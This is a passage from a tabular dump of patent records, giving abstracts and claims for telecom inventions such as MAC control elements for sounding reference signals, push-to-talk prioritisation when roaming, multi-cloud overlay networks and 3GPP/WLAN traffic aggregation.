receiving an encoded first frame of video data and a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; decoding the first frame; storing the first frame and its frame identifier at the storage location indicated in the current frame description; receiving an encoded second frame of the video data and at least one reference frame description for the second frame comprising: a reference frame identifier, and an indicator of said storage location; using the indicator in the reference frame description to access said storage location; comparing the frame identifier stored thereat with the reference frame identifier; and if the compared frame identifiers match, decoding the second frame using inter-frame decoding with the first frame stored thereat as a reference frame. | 2,400 |
9,159 | 9,159 | 16,277,220 | 2,413 | Systems and methods for Semi-Persistent Sounding Reference Signal (SP SRS) resource activation or deactivation are disclosed. In some embodiments, a method of operation of a wireless device in a cellular communications network comprises receiving, from a network node, a Medium Access Control (MAC) Control Element (CE). The MAC CE comprises an indication of a SP SRS resource set to be activated or deactivated and information that indicates a spatial relation for the SP SRS resource set to be activated or deactivated. In this manner, a MAC CE for SP SRS resource set activation or deactivation is provided in a manner that gives spatial relation information in an efficient and flexible manner. | 1. A method of operation of a wireless device in a cellular communications network, comprising:
receiving, from a network node, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 2. The method of claim 1 wherein the information that indicates the spatial relation comprises:
an indication of a type of reference signal for which the spatial relation is provided; and
an identifier of a reference signal resource set for the type of reference signal for which the spatial relation is provided. 3. The method of claim 2 wherein the indication of the type of reference signal indicates that the type of reference signal is a Channel State Information Reference Signal, CSI-RS, a Synchronization Signal Block, SSB, or a Sounding Reference Signal, SRS. 4. The method of claim 2 wherein the indication of the type of reference signal comprises two bits that indicate the type of reference signal, wherein:
a first state of the two bits indicates that the type of reference signal is a first type of reference signal;
a second state of the two bits indicates that the type of reference signal is a second type of reference signal; and
a third state of the two bits indicates that the type of reference signal is a third type of reference signal. 5. The method of claim 4 wherein the first type of reference signal is a Channel State Information Reference Signal, CSI-RS, the second type of reference signal is a Synchronization Signal Block, SSB, and the third type of reference signal is a Sounding Reference Signal, SRS. 6. The method of claim 2 wherein the MAC CE comprises:
a first octet that comprises the indication of the semi-persistent sounding reference signal resource set to be activated or deactivated; and
a second octet that comprises the indication of the type of reference signal for which the spatial relation is provided and the identifier of the reference signal resource set for the type of reference signal for which the spatial relation is provided. 7. The method of claim 6 wherein:
if a first bit in the second octet is set to a first state:
the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS; and
if the first bit in the second octet is set to a second state:
if a second bit in the second octet is set to a first state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB; and
if the second bit in the second octet is set to a second state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. 8. The method of claim 6 wherein:
a first bit in the second octet is set to a first state such that the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS. 9. The method of claim 6 wherein:
a first bit in the second octet is set to a second state;
a second bit in the second octet is set to a first state such that the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB. 10. The method of claim 6 wherein:
a first bit in the second octet is set to a second state;
a second bit in the second octet is set to a second state such that the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. 11. The method of claim 1 wherein:
if a first bit of an octet of the MAC CE is set to a first state, remaining bits in the octet comprise a first set of fields;
if the first bit of the octet is set to a second state and a second bit of the octet is set to a first state, remaining bits in the octet comprise a second set of fields; and
if the first bit of the octet is set to a second state and the second bit of the octet is set to a second state, remaining bits in the octet comprise a third set of fields. 12. The method of claim 11 wherein the first set of fields comprises a field comprising bits providing an identifier of a Channel State Information Reference Signal, CSI-RS, resource set for which a spatial relation is indicated. 13. The method of claim 11 wherein the second set of fields comprises a field comprising bits providing an identifier of a Synchronization Signal Block, SSB, resource set for which a spatial relation is indicated. 14. The method of claim 11 wherein the third set of fields comprises a field comprising bits providing an identifier of a Sounding Reference Signal, SRS, resource set for which a spatial relation is indicated. 15. The method of claim 1 wherein the indication is an indication to activate the semi-persistent sounding reference signal resource set, and the method further comprises transmitting a sounding reference signal on the activated semi-persistent sounding reference signal resource set. 16. A wireless device for a cellular communications network, the wireless device comprising:
an interface comprising radio front end circuitry; and processing circuitry associated with the interface, the processing circuitry configured to cause the wireless device to:
receive, from a network node via the interface, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 17. A method of operation of a network node in a cellular communications network, comprising:
transmitting, to a wireless device, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 18. The method of claim 17 wherein the information that indicates the spatial relation comprises:
an indication of a type of reference signal for which the spatial relation is provided; and
an identifier of a reference signal resource set for the type of reference signal for which the spatial relation is provided. 19. The method of claim 18 wherein the MAC CE comprises:
a first octet that comprises the indication of the semi-persistent sounding reference signal resource set to be activated or deactivated; and
a second octet that comprises the indication of the type of reference signal for which the spatial relation is provided and the identifier of the reference signal resource set for the type of reference signal for which the spatial relation is provided. 20. The method of claim 19 wherein:
if a first bit in the second octet is set to a first state:
the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS; and
if the first bit in the second octet is set to a second state:
if a second bit in the second octet is set to a first state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB; and
if the second bit in the second octet is set to a second state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. | Systems and methods for Semi-Persistent Sounding Reference Signal (SP SRS) resource activation or deactivation are disclosed. In some embodiments, a method of operation of a wireless device in a cellular communications network comprises receiving, from a network node, a Medium Access Control (MAC) Control Element (CE). The MAC CE comprises an indication of a SP SRS resource set to be activated or deactivated and information that indicates a spatial relation for the SP SRS resource set to be activated or deactivated. In this manner, a MAC CE for SP SRS resource set activation or deactivation is provided in a manner that gives spatial relation information in an efficient and flexible manner.1. A method of operation of a wireless device in a cellular communications network, comprising:
receiving, from a network node, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 2. The method of claim 1 wherein the information that indicates the spatial relation comprises:
an indication of a type of reference signal for which the spatial relation is provided; and
an identifier of a reference signal resource set for the type of reference signal for which the spatial relation is provided. 3. The method of claim 2 wherein the indication of the type of reference signal indicates that the type of reference signal is a Channel State Information Reference Signal, CSI-RS, a Synchronization Signal Block, SSB, or a Sounding Reference Signal, SRS. 4. The method of claim 2 wherein the indication of the type of reference signal comprises two bits that indicate the type of reference signal, wherein:
a first state of the two bits indicates that the type of reference signal is a first type of reference signal;
a second state of the two bits indicates that the type of reference signal is a second type of reference signal; and
a third state of the two bits indicates that the type of reference signal is a third type of reference signal. 5. The method of claim 4 wherein the first type of reference signal is a Channel State Information Reference Signal, CSI-RS, the second type of reference signal is a Synchronization Signal Block, SSB, and the third type of reference signal is a Sounding Reference Signal, SRS. 6. The method of claim 2 wherein the MAC CE comprises:
a first octet that comprises the indication of the semi-persistent sounding reference signal resource set to be activated or deactivated; and
a second octet that comprises the indication of the type of reference signal for which the spatial relation is provided and the identifier of the reference signal resource set for the type of reference signal for which the spatial relation is provided. 7. The method of claim 6 wherein:
if a first bit in the second octet is set to a first state:
the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS; and
if the first bit in the second octet is set to a second state:
if a second bit in the second octet is set to a first state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB; and
if the second bit in the second octet is set to a second state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. 8. The method of claim 6 wherein:
a first bit in the second octet is set to a first state such that the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS. 9. The method of claim 6 wherein:
a first bit in the second octet is set to a second state;
a second bit in the second octet is set to a first state such that the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB. 10. The method of claim 6 wherein:
a first bit in the second octet is set to a second state;
a second bit in the second octet is set to a second state such that the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. 11. The method of claim 1 wherein:
if a first bit of an octet of the MAC CE is set to a first state, remaining bits in the octet comprise a first set of fields;
if the first bit of the octet is set to a second state and a second bit of the octet is set to a first state, remaining bits in the octet comprise a second set of fields; and
if the first bit of the octet is set to a second state and the second bit of the octet is set to a second state, remaining bits in the octet comprise a third set of fields. 12. The method of claim 11 wherein the first set of fields comprises a field comprising bits providing an identifier of a Channel State Information Reference Signal, CSI-RS, resource set for which a spatial relation is indicated. 13. The method of claim 11 wherein the second set of fields comprises a field comprising bits providing an identifier of a Synchronization Signal Block, SSB, resource set for which a spatial relation is indicated. 14. The method of claim 11 wherein the third set of fields comprises a field comprising bits providing an identifier of a Sounding Reference Signal, SRS, resource set for which a spatial relation is indicated. 15. The method of claim 1 wherein the indication is an indication to activate the semi-persistent sounding reference signal resource set, and the method further comprises transmitting a sounding reference signal on the activated semi-persistent sounding reference signal resource set. 16. A wireless device for a cellular communications network, the wireless device comprising:
an interface comprising radio front end circuitry; and processing circuitry associated with the interface, the processing circuitry configured to cause the wireless device to:
receive, from a network node via the interface, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 17. A method of operation of a network node in a cellular communications network, comprising:
transmitting, to a wireless device, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 18. The method of claim 17 wherein the information that indicates the spatial relation comprises:
an indication of a type of reference signal for which the spatial relation is provided; and
an identifier of a reference signal resource set for the type of reference signal for which the spatial relation is provided. 19. The method of claim 18 wherein the MAC CE comprises:
a first octet that comprises the indication of the semi-persistent sounding reference signal resource set to be activated or deactivated; and
a second octet that comprises the indication of the type of reference signal for which the spatial relation is provided and the identifier of the reference signal resource set for the type of reference signal for which the spatial relation is provided. 20. The method of claim 19 wherein:
if a first bit in the second octet is set to a first state:
the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS; and
if the first bit in the second octet is set to a second state:
if a second bit in the second octet is set to a first state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB; and
if the second bit in the second octet is set to a second state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. | 2,400 |
9,160 | 9,160 | 15,958,320 | 2,462 | A method is provided that allows for prioritizing Push-To-Talk (PTT) service in a roamed network. PTT service is enabled for a mobile device at a first network. The mobile device roams to a second network that is of an older generation than the first network. It is determined that the mobile device has an active PTT subscription. PTT service is prioritized for the mobile device over circuit switched services on the second network. | 1. A method comprising:
enabling a mobile device for Push-To-Talk (PTT) service at a first network; roaming, by the mobile device, to a second network, the second network being of an older generation than the first network; determining that the mobile device has an active PTT subscription; and prioritizing PTT service for the mobile device over circuit switched services on the second network. 2. The method of claim 1, the method further comprising providing an indication on the mobile device that indicates that PIT service is prioritized for the mobile device over circuit switched services on the second network. 3. The method of claim 2, wherein the indication on the mobile device is a visual indicator on the mobile device. 4. The method of claim 2, wherein the indication on the mobile device is an audio indicator on the mobile device. 5. The method of claim 1, the method further comprising blocking incoming circuit switched voice calls. 6. The method of claim 1, the method further comprising disconnecting an ongoing voice call on the mobile device when a priority PTT call is placed at the mobile device. 7. The method of claim 1, wherein the step of determining that the mobile device has an active PTT subscription comprises receiving an identifier associated with the mobile device. 8. The method of claim 7, the method further comprising sending a message to a PTT server, the message indicating that circuit switched services are not enabled for the mobile device at the second network. 9. The method of claim 1, the method further comprising:
detecting that the mobile device has roamed back into the first network; and sending a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. 10. The method of claim 9, the method further comprising clearing a Visitor Location Register at the second network of records related to the mobile device. 11. The method of claim 9, the method further comprising restoring services for the mobile device on the first network. 12. A method comprising:
enabling a mobile device for a mission critical service at a first network, the first network providing concurrent services to the mobile device; roaming, by the mobile device, to a second network, the second network not able to provide concurrent services to the mobile device; determining that the mobile device has an active subscription for the mission critical service; and prioritizing the mission critical service for the mobile device over circuit switched services on the second network. 13. The method of claim 12, the method further comprising blocking incoming circuit switched voice calls. 14. The method of claim 12, the method further comprising disconnecting an ongoing voice call on the mobile device when a priority mission critical call is placed at the mobile device. 15. The method of claim 12, the method further comprising:
detecting that the mobile device has roamed back into the first network; and sending a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. 16. A communication system comprising a processor, the processor configured to:
enable a mobile device for Push-To-Talk (PTT) service; detect that the mobile device has roamed to a second network, the second network being of an older generation than the first network; determine that the mobile device has an active PTT subscription; and prioritize PTT service for the mobile device over circuit switched services on the second network. 17. The communication system of claim 16, wherein the processor s further configured to block incoming circuit switched voice calls. 18. The communication system of claim 16, wherein the processor is further configured to disconnect an ongoing voice call on the mobile device when a priority PTT call is placed at the mobile device. 19. The communication system of claim 16, wherein the processor is further configured to:
detect that the mobile device has roamed back into the first network; and send a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. | A method is provided that allows for prioritizing Push-To-Talk (PTT) service in a roamed network. PTT service is enabled for a mobile device at a first network. The mobile device roams to a second network that is of an older generation than the first network. It is determined that the mobile device has an active PTT subscription. PTT service is prioritized for the mobile device over circuit switched services on the second network.1. A method comprising:
enabling a mobile device for Push-To-Talk (PTT) service at a first network; roaming, by the mobile device, to a second network, the second network being of an older generation than the first network; determining that the mobile device has an active PTT subscription; and prioritizing PTT service for the mobile device over circuit switched services on the second network. 2. The method of claim 1, the method further comprising providing an indication on the mobile device that indicates that PIT service is prioritized for the mobile device over circuit switched services on the second network. 3. The method of claim 2, wherein the indication on the mobile device is a visual indicator on the mobile device. 4. The method of claim 2, wherein the indication on the mobile device is an audio indicator on the mobile device. 5. The method of claim 1, the method further comprising blocking incoming circuit switched voice calls. 6. The method of claim 1, the method further comprising disconnecting an ongoing voice call on the mobile device when a priority PTT call is placed at the mobile device. 7. The method of claim 1, wherein the step of determining that the mobile device has an active PTT subscription comprises receiving an identifier associated with the mobile device. 8. The method of claim 7, the method further comprising sending a message to a PTT server, the message indicating that circuit switched services are not enabled for the mobile device at the second network. 9. The method of claim 1, the method further comprising:
detecting that the mobile device has roamed back into the first network; and sending a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. 10. The method of claim 9, the method further comprising clearing a Visitor Location Register at the second network of records related to the mobile device. 11. The method of claim 9, the method further comprising restoring services for the mobile device on the first network. 12. A method comprising:
enabling a mobile device for a mission critical service at a first network, the first network providing concurrent services to the mobile device; roaming, by the mobile device, to a second network, the second network not able to provide concurrent services to the mobile device; determining that the mobile device has an active subscription for the mission critical service; and prioritizing the mission critical service for the mobile device over circuit switched services on the second network. 13. The method of claim 12, the method further comprising blocking incoming circuit switched voice calls. 14. The method of claim 12, the method further comprising disconnecting an ongoing voice call on the mobile device when a priority mission critical call is placed at the mobile device. 15. The method of claim 12, the method further comprising:
detecting that the mobile device has roamed back into the first network; and sending a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. 16. A communication system comprising a processor, the processor configured to:
enable a mobile device for Push-To-Talk (PTT) service; detect that the mobile device has roamed to a second network, the second network being of an older generation than the first network; determine that the mobile device has an active PTT subscription; and prioritize PTT service for the mobile device over circuit switched services on the second network. 17. The communication system of claim 16, wherein the processor s further configured to block incoming circuit switched voice calls. 18. The communication system of claim 16, wherein the processor is further configured to disconnect an ongoing voice call on the mobile device when a priority PTT call is placed at the mobile device. 19. The communication system of claim 16, wherein the processor is further configured to:
detect that the mobile device has roamed back into the first network; and send a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. | 2,400 |
9,161 | 9,161 | 15,972,086 | 2,461 | Some embodiments establish for an entity a virtual network over several public clouds of several public cloud providers and/or in several regions. In some embodiments, the virtual network is an overlay network that spans across several public clouds to interconnect one or more private networks (e.g., networks within branches, divisions, departments of the entity or their associated datacenters), mobile users, and SaaS (Software as a Service) provider machines, and other web applications of the entity. The virtual network in some embodiments can be configured to optimize the routing of the entity's data messages to their destinations for best end-to-end performance, reliability and security, while trying to minimize the routing of this traffic through the Internet. Also, the virtual network in some embodiments can be configured to optimize the layer 4 processing of the data message flows passing through the network. | 1. A method of forwarding data message flows through at least two public cloud datacenters of at least two different public cloud providers, the method comprising:
at an ingress forwarding element in a first public cloud datacenter,
receiving, from a first external machine outside of the public cloud datacenters, a data message addressed to a second external machine outside of the public cloud datacenters, said second external machine reachable through an egress forwarding element that is in a second public cloud datacenter;
encapsulating the data message with a first header that includes network addresses for the ingress and egress forwarding elements as source and destination addresses; and
encapsulating the data message with a second header that specifies source and destination network addresses as the network address of the ingress forwarding element and a network address of a next hop forwarding element that is in a public cloud datacenter and that is a next hop on a path to the egress forwarding element. 2. The method of claim 1, wherein the next hop forwarding element is in a third public cloud datacenter. 3. The method of claim 2, wherein the first, second and third public cloud datacenters belong to three different public cloud providers. 4. The method of claim 2, wherein the first and second public cloud datacenter belong to a first public cloud provider, while the third public cloud datacenter belongs to a different, second public cloud provider. 5. The method of claim 2, wherein the first and second public cloud datacenters belong to two different public cloud providers, while the third public cloud datacenter belongs to the public cloud provider of the first public cloud datacenter or the second public cloud datacenter. 6. The method of claim 2, wherein
the next hop forwarding element is a first next hop forwarding element, and the first next hop forwarding element identifies a second next hop forwarding element along the path as a next hop for the data message and in the second header specifies source and destination network addresses as the network addresses of the first next hop forwarding element and the second next hop forwarding element. 7. The method of claim 6, wherein the second next hop forwarding element is the egress forwarding element. 8. The method of claim 7, wherein after receiving the encapsulated data message, the egress forwarding element determines from the destination network address in the first header that the encapsulated data message is addressed to the egress forwarding element, removes the first and second headers from the data message, and forwards the data message to the second external machine. 9. The method of claim 6, wherein the second next hop forwarding element is a fourth forwarding element that is different than the second forwarding element. 10. The method of claim 1, wherein the next hop forwarding element is the second forwarding element. 11. The method of claim 1 further comprising:
processing at the ingress and egress forwarding elements data messages belonging to different tenants of a virtual network provider that defines different virtual networks over public cloud datacenters for the different tenants;
in the encapsulating first header of the received message, storing a tenant identifier that identifies the tenant associated with the first and second external machines. 12. The method of claim 11, wherein the encapsulation of the data message with the first and second headers defines, for the first tenant, an overlay virtual network that spans a group of networks of a group public cloud datacenters including the first and second public cloud datacenters. 13. The method of claim 12, wherein the tenants are corporations and the virtual networks are corporate wide area networks (WANs). 14. The method of claim 1, wherein
the first external machine is one of a machine in a first branch office, a machine in a private first datacenter, or a remote machine, and the second external machine is a machine in a second branch office or a machine in a private second datacenter. 15. A system for establishing a virtual network for an entity, the system comprising:
a first set of forwarding elements in a first multi-tenant public cloud operated by a first public cloud provider; and a second set of forwarding elements in a second multi-tenant public cloud operated by a second public cloud provider different than the first public cloud provider; said first and second sets of forwarding elements establishing first and second overlay virtual networks for first and second tenants of a virtual network provider with each overlay virtual network spanning both first and second multi-tenant public clouds, each overlay virtual network established by encapsulating each data message with first and second headers, the first header identifying ingress/egress interfaces in the virtual network for the data message, and the second header identifying a next hop in the overlay network for the data message. 16. The system of claim 15, wherein the next hop forwarding element is in a third public cloud datacenter. 17. The system of claim 16, wherein the first, second and third public cloud datacenters belong to three different public cloud providers. 18. The system of claim 16, wherein the first and second public cloud datacenter belong to a first public cloud provider, while the third public cloud datacenter belongs to a different, second public cloud provider. 19. The system of claim 16, wherein the first and second public cloud datacenters belong to two different public cloud providers, while the third public cloud datacenter belongs to the public cloud provider of the first public cloud datacenter or the second public cloud datacenter. 20. The system of claim 16, wherein
the next hop forwarding element is a first next hop forwarding element, and the first next hop forwarding element identifies a second next hop forwarding element along the path as a next hop for the data message and in the second header specifies source and destination network addresses as the network addresses of the first next hop forwarding element and the second next hop forwarding element. | Some embodiments establish for an entity a virtual network over several public clouds of several public cloud providers and/or in several regions. In some embodiments, the virtual network is an overlay network that spans across several public clouds to interconnect one or more private networks (e.g., networks within branches, divisions, departments of the entity or their associated datacenters), mobile users, and SaaS (Software as a Service) provider machines, and other web applications of the entity. The virtual network in some embodiments can be configured to optimize the routing of the entity's data messages to their destinations for best end-to-end performance, reliability and security, while trying to minimize the routing of this traffic through the Internet. Also, the virtual network in some embodiments can be configured to optimize the layer 4 processing of the data message flows passing through the network.1. A method of forwarding data message flows through at least two public cloud datacenters of at least two different public cloud providers, the method comprising:
at an ingress forwarding element in a first public cloud datacenter,
receiving, from a first external machine outside of the public cloud datacenters, a data message addressed to a second external machine outside of the public cloud datacenters, said second external machine reachable through an egress forwarding element that is in a second public cloud datacenter;
encapsulating the data message with a first header that includes network addresses for the ingress and egress forwarding elements as source and destination addresses; and
encapsulating the data message with a second header that specifies source and destination network addresses as the network address of the ingress forwarding element and a network address of a next hop forwarding element that is in a public cloud datacenter and that is a next hop on a path to the egress forwarding element. 2. The method of claim 1, wherein the next hop forwarding element is in a third public cloud datacenter. 3. The method of claim 2, wherein the first, second and third public cloud datacenters belong to three different public cloud providers. 4. The method of claim 2, wherein the first and second public cloud datacenter belong to a first public cloud provider, while the third public cloud datacenter belongs to a different, second public cloud provider. 5. The method of claim 2, wherein the first and second public cloud datacenters belong to two different public cloud providers, while the third public cloud datacenter belongs to the public cloud provider of the first public cloud datacenter or the second public cloud datacenter. 6. The method of claim 2, wherein
the next hop forwarding element is a first next hop forwarding element, and the first next hop forwarding element identifies a second next hop forwarding element along the path as a next hop for the data message and in the second header specifies source and destination network addresses as the network addresses of the first next hop forwarding element and the second next hop forwarding element. 7. The method of claim 6, wherein the second next hop forwarding element is the egress forwarding element. 8. The method of claim 7, wherein after receiving the encapsulated data message, the egress forwarding element determines from the destination network address in the first header that the encapsulated data message is addressed to the egress forwarding element, removes the first and second headers from the data message, and forwards the data message to the second external machine. 9. The method of claim 6, wherein the second next hop forwarding element is a fourth forwarding element that is different than the second forwarding element. 10. The method of claim 1, wherein the next hop forwarding element is the second forwarding element. 11. The method of claim 1 further comprising:
processing at the ingress and egress forwarding elements data messages belonging to different tenants of a virtual network provider that defines different virtual networks over public cloud datacenters for the different tenants;
in the encapsulating first header of the received message, storing a tenant identifier that identifies the tenant associated with the first and second external machines. 12. The method of claim 11, wherein the encapsulation of the data message with the first and second headers defines, for the first tenant, an overlay virtual network that spans a group of networks of a group public cloud datacenters including the first and second public cloud datacenters. 13. The method of claim 12, wherein the tenants are corporations and the virtual networks are corporate wide area networks (WANs). 14. The method of claim 1, wherein
the first external machine is one of a machine in a first branch office, a machine in a private first datacenter, or a remote machine, and the second external machine is a machine in a second branch office or a machine in a private second datacenter. 15. A system for establishing a virtual network for an entity, the system comprising:
a first set of forwarding elements in a first multi-tenant public cloud operated by a first public cloud provider; and a second set of forwarding elements in a second multi-tenant public cloud operated by a second public cloud provider different than the first public cloud provider; said first and second sets of forwarding elements establishing first and second overlay virtual networks for first and second tenants of a virtual network provider with each overlay virtual network spanning both first and second multi-tenant public clouds, each overlay virtual network established by encapsulating each data message with first and second headers, the first header identifying ingress/egress interfaces in the virtual network for the data message, and the second header identifying a next hop in the overlay network for the data message. 16. The system of claim 15, wherein the next hop forwarding element is in a third public cloud datacenter. 17. The system of claim 16, wherein the first, second and third public cloud datacenters belong to three different public cloud providers. 18. The system of claim 16, wherein the first and second public cloud datacenter belong to a first public cloud provider, while the third public cloud datacenter belongs to a different, second public cloud provider. 19. The system of claim 16, wherein the first and second public cloud datacenters belong to two different public cloud providers, while the third public cloud datacenter belongs to the public cloud provider of the first public cloud datacenter or the second public cloud datacenter. 20. The system of claim 16, wherein
the next hop forwarding element is a first next hop forwarding element, and the first next hop forwarding element identifies a second next hop forwarding element along the path as a next hop for the data message and in the second header specifies source and destination network addresses as the network addresses of the first next hop forwarding element and the second next hop forwarding element. | 2,400 |
9,162 | 9,162 | 15,030,535 | 2,415 | A method and communication node for providing traffic aggregation between a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network. The communication node establishes an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently. The communication node can then communicate data and/or messages over the WLAN network across the aggregation interface, without requiring any modifications or adaptions in the WLAN network. The communication node may be the wireless device or the base station. | 1. A method performed by a communication node for providing traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to the WLAN network, the method comprising:
establishing an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and communicating data and/or messages across the aggregation interface. 2. A method according to claim 1, wherein the aggregation interface is implemented as a tunnel in which aggregation frames are encapsulated. 3. A method according to claim 2, wherein the aggregation frames comprise any of: Medium Access Control, MAC, frames, Radio Link Control, RLC, frames and Packet Data Convergence Protocol, PDCP, frames. 4. A method according to claim 2, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 5. A method according to claim 2, wherein the tunnel is implemented as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 6. A method according to claim 1, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 7. A method according to claim 1, wherein the communicated data and/or messages are forwarded over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 8. A method according to claim 1, wherein the communicated data and/or messages are forwarded over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 9. A method according to claim 1, wherein the communication node is the wireless device, and wherein the wireless device receives address information signalled from the base station and uses the received address information for establishing the aggregation interface. 10. A method according to claim 1, wherein the communication node is the base station, and wherein the base station receives address information signalled from the wireless device and uses the received address information for establishing the aggregation interface. 11. A method according to claim 9, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. 12. A communication node arranged to provide traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network, the communication node comprising a processor (P) and a memory (M), said memory comprising instructions executable by said processor whereby the communication node is configured to:
establish an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and communicate data and/or messages across the aggregation interface. 13. A communication node according to claim 12, wherein the communication node is configured to implement the aggregation interface as a tunnel in which aggregation frames are encapsulated. 14. A communication node according to claim 13, wherein the aggregation frames comprise any of: MAC frames, RLC frames and PDCP frames. 15. A communication node according to claim 13, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 16. A communication node according to claim 13, wherein the communication node is configured to implement the tunnel as any of:
